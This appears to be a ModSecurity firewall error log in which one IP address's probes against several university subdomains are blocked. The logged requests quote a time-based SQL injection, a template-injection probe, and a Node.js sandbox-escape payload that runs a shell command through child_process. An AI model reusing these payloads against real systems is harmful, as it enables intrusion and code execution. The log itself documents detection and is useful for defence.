[Tue Aug 29 11:31:52.651677 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAN@5K0AAAAO"]
[Tue Aug 29 11:31:53.343165 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQSWPAAAAA0"]
[Tue Aug 29 11:31:53.363631 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQSWPEAAAA0"]
[Tue Aug 29 11:31:53.365187 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAANWgV8AAAAG"]
[Tue Aug 29 11:31:53.369383 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10ucCo-f0AAAP5mMIAAAAM"]
[Tue Aug 29 11:31:53.387935 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQJWxkAAAAr"]
[Tue Aug 29 11:31:53.389004 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10ucCo-f0AAAQv1kcAAAAA"]
[Tue Aug 29 11:31:53.389163 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAQNwJ8AAAAv"]
[Tue Aug 29 11:31:53.411827 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAPiBm0AAAAB"]
[Tue Aug 29 11:31:53.432066 2023] [:error] [pid 1071] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAQv1kkAAAAA"]
[Tue Aug 29 11:31:53.450858 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10ucCo-f0AAANWgWIAAAAG"]
[Tue Aug 29 11:31:54.341990 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAP@M4gAAAAZ"]
[Tue Aug 29 11:31:54.366526 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAQR49AAAAAz"]
[Tue Aug 29 11:31:54.368601 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAQSWPcAAAA0"]
[Tue Aug 29 11:31:54.370935 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10usCo-f0AAAP8G2QAAAAV"]
[Tue Aug 29 11:31:54.371308 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10usCo-f0AAAPDn-IAAAAP"]
[Tue Aug 29 11:31:54.377655 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10usCo-f0AAAQkBY8AAAAC"]
[Tue Aug 29 11:31:54.396941 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAQkBZAAAAAC"]
[Tue Aug 29 11:31:55.324556 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAQkBZIAAAAC"]
[Tue Aug 29 11:31:55.397614 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAPiBnMAAAAB"]
[Tue Aug 29 11:31:55.412983 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAQJWyQAAAAr"]
[Tue Aug 29 11:31:55.415934 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAQV4Q4AAAA3"]
[Tue Aug 29 11:31:55.416266 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10u8Co-f0AAAPDn-gAAAAP"]
[Tue Aug 29 11:31:55.459566 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAPiBnYAAAAB"]
[Tue Aug 29 11:31:56.327645 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQNwKgAAAAv"]
[Tue Aug 29 11:31:56.333650 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vMCo-f0AAAQkBZYAAAAC"]
[Tue Aug 29 11:31:56.351194 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10vMCo-f0AAANsAWIAAAAD"]
